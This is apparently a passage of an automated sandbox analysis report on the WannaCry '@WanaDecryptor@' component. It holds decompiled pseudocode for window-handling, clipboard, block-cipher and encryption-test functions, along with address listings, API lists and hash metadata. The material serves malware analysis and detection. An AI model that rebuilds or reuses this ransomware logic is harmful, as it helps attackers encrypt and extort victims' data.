								 *((intOrPtr*)(_t226 + 0x118)) = 0;
								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
								 *((intOrPtr*)(_t226 + 0x120)) = 0;
								 *((intOrPtr*)(_t226 + 0x124)) = 0;
								 *((intOrPtr*)(_t226 + 0x128)) = 0;
								__eflags = 0;
								return 0;
							} else {
								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
							}
						}
					}
				}
				L73:
			}





























































                                                      0x00411cf9
                                                      0x00411d00
                                                      0x00411d03
                                                      0x00411d07
                                                      0x00411d0b
                                                      0x00412233
                                                      0x0041223f
                                                      0x00411d11
                                                      0x00411d11
                                                      0x00411d16
                                                      0x00000000
                                                      0x00411d1c
                                                      0x00411d1f
                                                      0x00411d22
                                                      0x00411d27
                                                      0x00411d27
                                                      0x00411d30
                                                      0x00411d35
                                                      0x00411d5a
                                                      0x00411d5c
                                                      0x00411db5
                                                      0x00411db7
                                                      0x00411dba
                                                      0x00411dbd
                                                      0x00411dc2
                                                      0x00411dc2
                                                      0x00411dc5
                                                      0x00411dc7
                                                      0x00411dca
                                                      0x00411dcd
                                                      0x00411dd2
                                                      0x00411dd4
                                                      0x00411dd7
                                                      0x00411dd7
                                                      0x00411df9
                                                      0x00411e10
                                                      0x00411e15
                                                      0x00411e18
                                                      0x00411e1a
                                                      0x00411e39
                                                      0x00411e3e
                                                      0x00411e41
                                                      0x00411e43
                                                      0x00411e56
                                                      0x00411e5a
                                                      0x00411e5b
                                                      0x00411e62
                                                      0x00411e68
                                                      0x00411e73
                                                      0x00411e7c
                                                      0x00411e7f
                                                      0x00411e81
                                                      0x00411eae
                                                      0x00411eb7
                                                      0x00411eb9
                                                      0x00411ebd
                                                      0x00411ec9
                                                      0x00411ecd
                                                      0x00411ed4
                                                      0x00411ed4
                                                      0x00411ed7
                                                      0x00411ed7
                                                      0x00411ed9
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee6
                                                      0x00411ee6
                                                      0x00411ee9
                                                      0x00411eeb
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411ef0
                                                      0x00411ef0
                                                      0x00411ef2
                                                      0x00411ef4
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411ef7
                                                      0x00411ef9
                                                      0x00411efb
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411efe
                                                      0x00411f03
                                                      0x00411f04
                                                      0x00411f09
                                                      0x00411f0c
                                                      0x00411f0e
                                                      0x00411f10
                                                      0x00411f10
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411f15
                                                      0x00411f1a
                                                      0x00411f1b
                                                      0x00411f20
                                                      0x00411f23
                                                      0x00411f25
                                                      0x00411f27
                                                      0x00411f27
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411f2c
                                                      0x00411f31
                                                      0x00411f32
                                                      0x00411f37
                                                      0x00411f3a
                                                      0x00411f3c
                                                      0x00411f3e
                                                      0x00411f3e
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00411ee0
                                                      0x00411f43
                                                      0x00411f48
                                                      0x00411f49
                                                      0x00411f4e
                                                      0x00411f51
                                                      0x00411f53
                                                      0x00411f55
                                                      0x00411f55
                                                      0x00000000
                                                      0x00411f55
                                                      0x00411f5f
                                                      0x00411f6a
                                                      0x00411f6e
                                                      0x00411f75
                                                      0x00411f75
                                                      0x00411f7e
                                                      0x00411f83
                                                      0x00411f83
                                                      0x00411f93
                                                      0x00411f95
                                                      0x00411f98
                                                      0x00411f98
                                                      0x00411f9b
                                                      0x00411fa0
                                                      0x00411fa2
                                                      0x00411fb3
                                                      0x00411fbb
                                                      0x00411fbe
                                                      0x00411fc9
                                                      0x00411fd5
                                                      0x00411fd7
                                                      0x00411fd7
                                                      0x00411fda
                                                      0x00411fa4
                                                      0x00411fa4
                                                      0x00411fa7
                                                      0x00000000
                                                      0x00411fa9
                                                      0x00411fa9
                                                      0x00411fac
                                                      0x00000000
                                                      0x00411fae
                                                      0x00411fae
                                                      0x00411fb1
                                                      0x00000000
                                                      0x00000000
                                                      0x00411fb1
                                                      0x00411fac
                                                      0x00411fa7
                                                      0x00411fdc
                                                      0x00411fde
                                                      0x00411fe0
                                                      0x00411fe6
                                                      0x00411fe8
                                                      0x00411fe8
                                                      0x00411ff2
                                                      0x00411ff4
                                                      0x00411ffc
                                                      0x00411ffc
                                                      0x00411ffe
                                                      0x00411ffe
                                                      0x00412008
                                                      0x0041200a
                                                      0x00412012
                                                      0x00412012
                                                      0x00412014
                                                      0x00412014
                                                      0x0041201a
                                                      0x0041201c
                                                      0x00412024
                                                      0x00412024
                                                      0x00412026
                                                      0x00412026
                                                      0x00412035
                                                      0x00412037
                                                      0x00412039
                                                      0x00412039
                                                      0x00412039
                                                      0x00412039
                                                      0x00412043
                                                      0x00412047
                                                      0x00412058
                                                      0x0041205e
                                                      0x00412063
                                                      0x00412066
                                                      0x00412074
                                                      0x00412078
                                                      0x0041207e
                                                      0x00412082
                                                      0x00412086
                                                      0x0041208c
                                                      0x00412092
                                                      0x0041209c
                                                      0x0041209e
                                                      0x004120a4
                                                      0x004120aa
                                                      0x004120b0
                                                      0x004121f2
                                                      0x004120b6
                                                      0x004120b6
                                                      0x004120ba
                                                      0x004120bf
                                                      0x004120c6
                                                      0x004120ca
                                                      0x004120ce
                                                      0x004120d3
                                                      0x004120d7
                                                      0x004120d7
                                                      0x004120d9
                                                      0x004120db
                                                      0x004120dd
                                                      0x00000000
                                                      0x00000000
                                                      0x004120df
                                                      0x004120e1
                                                      0x004120f7
                                                      0x004120f7
                                                      0x004120e3
                                                      0x004120e3
                                                      0x004120e6
                                                      0x004120e8
                                                      0x004120e8
                                                      0x004120eb
                                                      0x00000000
                                                      0x004120ed
                                                      0x004120ed
                                                      0x004120f0
                                                      0x004120f3
                                                      0x004120f5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004120f5
                                                      0x004120eb
                                                      0x00412100
                                                      0x00412100
                                                      0x00412102
                                                      0x00412120
                                                      0x00412124
                                                      0x00412133
                                                      0x00412136
                                                      0x00412138
                                                      0x0041213c
                                                      0x00412150
                                                      0x00412153
                                                      0x0041215e
                                                      0x00412161
                                                      0x00412166
                                                      0x0041216a
                                                      0x00412170
                                                      0x00412173
                                                      0x00412173
                                                      0x00412179
                                                      0x0041217b
                                                      0x0041218f
                                                      0x00412192
                                                      0x0041219d
                                                      0x004121a0
                                                      0x004121a5
                                                      0x004121a9
                                                      0x004121af
                                                      0x004121b2
                                                      0x004121b2
                                                      0x004121b8
                                                      0x004121ba
                                                      0x004121e1
                                                      0x004121e7
                                                      0x004121ea
                                                      0x004121ea
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00412102
                                                      0x004120fb
                                                      0x004120fd
                                                      0x00000000
                                                      0x00412104
                                                      0x0041210e
                                                      0x00412115
                                                      0x00412115
                                                      0x00412119
                                                      0x004121f6
                                                      0x004121f6
                                                      0x004121f8
                                                      0x004121fa
                                                      0x004121fb
                                                      0x00412200
                                                      0x00412200
                                                      0x00412203
                                                      0x00412214
                                                      0x0041221f
                                                      0x00412225
                                                      0x0041222e
                                                      0x00000000
                                                      0x0041222e
                                                      0x00411e83
                                                      0x00411e83
                                                      0x00411e84
                                                      0x00411e9a
                                                      0x00411e9a
                                                      0x00411e47
                                                      0x00411e53
                                                      0x00411e53
                                                      0x00411e1e
                                                      0x00411e2a
                                                      0x00411e2a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411d37
                                                      0x00411d39
                                                      0x00411d5e
                                                      0x00411d66
                                                      0x00411d6d
                                                      0x00411d71
                                                      0x00411d74
                                                      0x00411d7a
                                                      0x00411d80
                                                      0x00411d86
                                                      0x00411d8c
                                                      0x00411d92
                                                      0x00411d98
                                                      0x00411d9e
                                                      0x00411da4
                                                      0x00411daa
                                                      0x00411db2
                                                      0x00411d3b
                                                      0x00411d57
                                                      0x00411d57
                                                      0x00411d39
                                                      0x00411d35
                                                      0x00411d16
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /../$/..\$\../$\..\
                                                      • API String ID: 0-3885502717
                                                      • Opcode ID: 640072b25ce39f29e2e0ef118f9821fd9eceea7f93f8cfb82637dd0406826ea6
                                                      • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                                      • Opcode Fuzzy Hash: 640072b25ce39f29e2e0ef118f9821fd9eceea7f93f8cfb82637dd0406826ea6
                                                      • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004067F0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E004067F0(void* __ecx) {
				signed int _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				int _t16;
				int _t21;
				int _t22;
				int _t37;
				struct tagRECT* _t48;
				void* _t56;

				_t56 = __ecx;
				_t16 = IsIconic( *(__ecx + 0x20));
				if(_t16 == 0) {
					L00412CBC();
					return _t16;
				} else {
					_push(_t56);
					L00412DD0();
					asm("sbb eax, eax");
					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
					_t21 = GetSystemMetrics(0xb);
					_t22 = GetSystemMetrics(0xc);
					_t48 =  &_v104;
					GetClientRect( *(_t56 + 0x20), _t48);
					asm("cdq");
					asm("cdq");
					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
					L00412DB8();
					return _t37;
				}
			}















                                                      0x004067f4
                                                      0x004067fa
                                                      0x00406802
                                                      0x0040689c
                                                      0x004068a5
                                                      0x00406808
                                                      0x0040680a
                                                      0x0040680f
                                                      0x00406823
                                                      0x0040682b
                                                      0x00406839
                                                      0x0040683f
                                                      0x00406846
                                                      0x0040684c
                                                      0x00406866
                                                      0x00406879
                                                      0x00406884
                                                      0x0040688e
                                                      0x00406899
                                                      0x00406899

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                      • String ID:
                                                      • API String ID: 1397574227-0
                                                      • Opcode ID: c6b99cd5ac0b71c3c4030717ac5958d372fb1afb6ef73d6220d96d7f8d3b0266
                                                      • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                                      • Opcode Fuzzy Hash: c6b99cd5ac0b71c3c4030717ac5958d372fb1afb6ef73d6220d96d7f8d3b0266
                                                      • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B3C0 Relevance: 12.2, APIs: 8, Instructions: 203COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 65%
                                                      			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
				void* _v4;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				struct HWND__* _v32;
				WCHAR* _v36;
				struct HWND__* _t90;
				signed int* _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t109;
				signed int _t113;
				signed int _t114;
				signed int _t121;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t138;
				signed int _t143;
				signed int _t152;
				signed int _t157;
				void* _t185;
				void* _t188;
				signed int* _t191;
				void* _t204;
				signed int _t206;
				struct HWND__* _t207;
				void* _t211;
				void* _t212;
				void* _t217;
				void* _t218;
				signed int _t221;
				void* _t224;
				signed int* _t226;
				void* _t227;
				void* _t228;

				_t228 = _t227 - 0xc;
				_t124 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t206 = _a12;
				_t185 = 0;
				if(_t206 == 0) {
					L26:
					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
					_push(_t206);
					_t90 = FindWindowW(0, _v36); // executed
					_t207 = _t90;
					if(_t207 != 0) {
						_push(_t185);
						ShowWindow(_t207, 5); // executed
						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
						SetForegroundWindow(_t207); // executed
						SetFocus(_t207);
						SetActiveWindow(_t207);
						BringWindowToTop(_t207);
						_t90 = _v32;
						if(_t90 != 0) {
							ExitProcess(0);
						}
					}
					return _t90;
				} else {
					_t130 =  *(_t124 + 0x3cc);
					if(_t206 % _t130 != 0) {
						goto L26;
					} else {
						_t100 = _a16;
						if(_t100 != 1) {
							L13:
							_a16 = _t185;
							if(_t100 != 2) {
								L23:
								_t102 = _t206 / _t130;
								_t188 = _a4;
								_t221 = _a8;
								if(_t102 <= 0) {
									goto L11;
								} else {
									do {
										_push(_t221);
										_push(_t188);
										E0040B0C0(_t124);
										_t132 =  *(_t124 + 0x3cc);
										_t188 = _t188 + _t132;
										_t221 = _t221 + _t132;
										_a8 = _a8 + 1;
										_t105 = _t206 / _t132;
									} while (_a8 < _t105);
									return _t105;
								}
							} else {
								_t102 = _t206 / _t130;
								_t191 = _a8;
								_t224 = _a4;
								_a4 = _t191;
								if(_t102 <= 0) {
									goto L11;
								} else {
									while(1) {
										_t50 = _t124 + 0x3f0; // 0x444
										_push(_t191);
										E0040ADC0(_t124);
										_t109 = _t191;
										if( *((intOrPtr*)(_t124 + 4)) == 0) {
											break;
										}
										_t211 = 0;
										if( *(_t124 + 0x3cc) > 0) {
											do {
												 *_t109 =  *_t109 ^  *(_t211 + _t224);
												_t109 =  &(_t109[0]);
												_t211 = _t211 + 1;
											} while (_t211 <  *(_t124 + 0x3cc));
										}
										_t212 = _t224;
										_t56 = _t124 + 0x3f0; // 0x444
										_t138 =  *(_t124 + 0x3cc) >> 2;
										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
										_t228 = _t228 + 0x18;
										_t143 =  *(_t124 + 0x3cc);
										_t114 = _t113 / _t143;
										_t224 = _t224 + _t143;
										_v4 = _v4 + _t143;
										_t206 = _a8 + 1;
										_a8 = _t206;
										if(_t206 < _t114) {
											_t191 = _v4;
											continue;
										} else {
											return _t114;
										}
										goto L31;
									}
									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
									_t130 =  &_v24;
									_push(0x41c9c0);
									_push(_t130);
									L004130FC();
									goto L23;
								}
							}
						} else {
							_t102 = _t206 / _t130;
							_t226 = _a8;
							_a16 = 0;
							if(_t102 <= 0) {
								L11:
								return _t102;
							} else {
								while(1) {
									_push(_t226);
									_push(_a4);
									E0040B0C0(_t124);
									_t100 = _t226;
									if( *((intOrPtr*)(_t124 + 4)) == 0) {
										break;
									}
									_t217 = 0;
									if( *(_t124 + 0x3cc) > 0) {
										_t22 = _t124 - _t226 + 0x3f0; // 0x444
										_t204 = _t22;
										do {
											 *_t100 =  *_t100 ^  *(_t204 + _t100);
											_t100 =  &(_t100[0]);
											_t217 = _t217 + 1;
										} while (_t217 <  *(_t124 + 0x3cc));
									}
									_t218 = _v4;
									_t27 = _t124 + 0x3f0; // 0x444
									_t152 =  *(_t124 + 0x3cc) >> 2;
									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
									_t228 = _t228 + 0x18;
									_t157 =  *(_t124 + 0x3cc);
									_t102 = _t121 / _t157;
									_t185 = _v4 + _t157;
									_t226 = _t226 + _t157;
									_t206 = _a8 + 1;
									_v4 = _t185;
									_a8 = _t206;
									if(_t206 < _t102) {
										continue;
									} else {
										goto L11;
									}
									goto L31;
								}
								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
								_t130 =  &_v24;
								_push(0x41c9c0);
								_push(_t130);
								L004130FC();
								goto L13;
							}
						}
					}
				}
				L31:
			}








































                                                      0x0040b3c0
                                                      0x0040b3c4
                                                      0x0040b3ce
                                                      0x0040b3d9
                                                      0x0040b3e3
                                                      0x0040b3e8
                                                      0x0040b3e9
                                                      0x0040b3e9
                                                      0x0040b3ee
                                                      0x0040b3f2
                                                      0x0040b3f6
                                                      0x0040b602
                                                      0x0040b60b
                                                      0x0040b615
                                                      0x0040b61a
                                                      0x0040b61b
                                                      0x0040b624
                                                      0x0040b628
                                                      0x0040b62e
                                                      0x0040b632
                                                      0x0040b634
                                                      0x0040b638
                                                      0x0040b651
                                                      0x0040b660
                                                      0x0040b663
                                                      0x0040b66a
                                                      0x0040b671
                                                      0x0040b678
                                                      0x0040b67e
                                                      0x0040b685
                                                      0x0040b689
                                                      0x0040b689
                                                      0x0040b685
                                                      0x0040b690
                                                      0x0040b3fc
                                                      0x0040b3fc
                                                      0x0040b40a
                                                      0x00000000
                                                      0x0040b410
                                                      0x0040b410
                                                      0x0040b417
                                                      0x0040b4ed
                                                      0x0040b4f0
                                                      0x0040b4f4
                                                      0x0040b5ba
                                                      0x0040b5be
                                                      0x0040b5c0
                                                      0x0040b5c4
                                                      0x0040b5ca
                                                      0x00000000
                                                      0x0040b5d0
                                                      0x0040b5d0
                                                      0x0040b5d0
                                                      0x0040b5d1
                                                      0x0040b5d4
                                                      0x0040b5d9
                                                      0x0040b5e3
                                                      0x0040b5e5
                                                      0x0040b5ea
                                                      0x0040b5f0
                                                      0x0040b5f2
                                                      0x0040b5ff
                                                      0x0040b5ff
                                                      0x0040b4fa
                                                      0x0040b4fe
                                                      0x0040b500
                                                      0x0040b504
                                                      0x0040b508
                                                      0x0040b50e
                                                      0x00000000
                                                      0x0040b510
                                                      0x0040b516
                                                      0x0040b516
                                                      0x0040b51c
                                                      0x0040b520
                                                      0x0040b528
                                                      0x0040b52c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b534
                                                      0x0040b538
                                                      0x0040b53a
                                                      0x0040b541
                                                      0x0040b549
                                                      0x0040b54a
                                                      0x0040b54b
                                                      0x0040b53a
                                                      0x0040b555
                                                      0x0040b559
                                                      0x0040b55f
                                                      0x0040b56f
                                                      0x0040b56f
                                                      0x0040b571
                                                      0x0040b57b
                                                      0x0040b57f
                                                      0x0040b581
                                                      0x0040b589
                                                      0x0040b58a
                                                      0x0040b590
                                                      0x0040b512
                                                      0x00000000
                                                      0x0040b592
                                                      0x0040b599
                                                      0x0040b599
                                                      0x00000000
                                                      0x0040b590
                                                      0x0040b5a5
                                                      0x0040b5ab
                                                      0x0040b5af
                                                      0x0040b5b4
                                                      0x0040b5b5
                                                      0x00000000
                                                      0x0040b5b5
                                                      0x0040b50e
                                                      0x0040b41d
                                                      0x0040b429
                                                      0x0040b42b
                                                      0x0040b42f
                                                      0x0040b435
                                                      0x0040b4c5
                                                      0x0040b4cc
                                                      0x0040b43b
                                                      0x0040b43b
                                                      0x0040b43f
                                                      0x0040b440
                                                      0x0040b443
                                                      0x0040b44b
                                                      0x0040b44f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b457
                                                      0x0040b45b
                                                      0x0040b461
                                                      0x0040b461
                                                      0x0040b467
                                                      0x0040b46e
                                                      0x0040b476
                                                      0x0040b477
                                                      0x0040b478
                                                      0x0040b467
                                                      0x0040b482
                                                      0x0040b488
                                                      0x0040b48e
                                                      0x0040b49e
                                                      0x0040b49e
                                                      0x0040b4a0
                                                      0x0040b4aa
                                                      0x0040b4b0
                                                      0x0040b4b2
                                                      0x0040b4b4
                                                      0x0040b4b5
                                                      0x0040b4b9
                                                      0x0040b4bf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b4bf
                                                      0x0040b4d8
                                                      0x0040b4de
                                                      0x0040b4e2
                                                      0x0040b4e7
                                                      0x0040b4e8
                                                      0x00000000
                                                      0x0040b4e8
                                                      0x0040b435
                                                      0x0040b417
                                                      0x0040b40a
                                                      0x00000000

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 2930f8dc85a5339e3a1fcc916d8be05eb344af61b78126309babfa6b5c92ee79
                                                      • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                                      • Opcode Fuzzy Hash: 2930f8dc85a5339e3a1fcc916d8be05eb344af61b78126309babfa6b5c92ee79
                                                      • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407C30 Relevance: 12.0, APIs: 8, Instructions: 48clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00407C30(void* __ecx) {
				int _t9;
				void* _t15;
				void* _t22;
				signed int _t25;
				signed int _t26;
				void* _t39;
				void* _t40;

				_t39 = __ecx;
				_t9 = OpenClipboard( *(__ecx + 0x20));
				if(_t9 == 0) {
					return _t9;
				} else {
					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
					if(_t22 != 0) {
						EmptyClipboard();
						_t40 =  *(_t39 + 0x508);
						_t15 = GlobalLock(_t22);
						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
						_t26 = _t25 >> 2;
						memcpy(_t15, _t40, _t26 << 2);
						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
						GlobalUnlock(_t22);
						SetClipboardData(1, _t22);
						return CloseClipboard();
					}
					return CloseClipboard();
				}
			}










                                                      0x00407c32
                                                      0x00407c38
                                                      0x00407c40
                                                      0x00407cab
                                                      0x00407c42
                                                      0x00407c55
                                                      0x00407c59
                                                      0x00407c66
                                                      0x00407c6c
                                                      0x00407c79
                                                      0x00407c7f
                                                      0x00407c86
                                                      0x00407c89
                                                      0x00407c90
                                                      0x00407c92
                                                      0x00407c9b
                                                      0x00000000
                                                      0x00407ca8
                                                      0x00407c63
                                                      0x00407c63

                                                      APIs
                                                      • OpenClipboard.USER32(?), ref: 00407C38
                                                      • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                                      • CloseClipboard.USER32 ref: 00407C5B
                                                      • EmptyClipboard.USER32 ref: 00407C66
                                                      • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                                      • CloseClipboard.USER32 ref: 00407CA1
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                                      • String ID:
                                                      • API String ID: 142981918-0
                                                      • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                                      • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004047C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154encryptionstringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 47%
                                                      			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				long* _v8;
				char _v20;
				void _v539;
				char _v540;
				char _v543;
				char _v544;
				intOrPtr _v548;
				char _v552;
				int _v556;
				intOrPtr _v560;
				void* __ebx;
				char _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t63;
				intOrPtr _t67;
				signed int _t76;
				unsigned int _t78;
				signed int _t79;
				long* _t85;
				char _t92;
				void* _t116;
				intOrPtr _t118;
				void* _t120;
				void* _t121;

				_push(0xffffffff);
				_push(0x415e38);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_t63 = __ecx;
				_v560 = __ecx;
				_t38 = "TESTDATA"; // 0x54534554
				_v552 = _t38;
				_t67 =  *0x420c64; // 0x41544144
				_v548 = _t67;
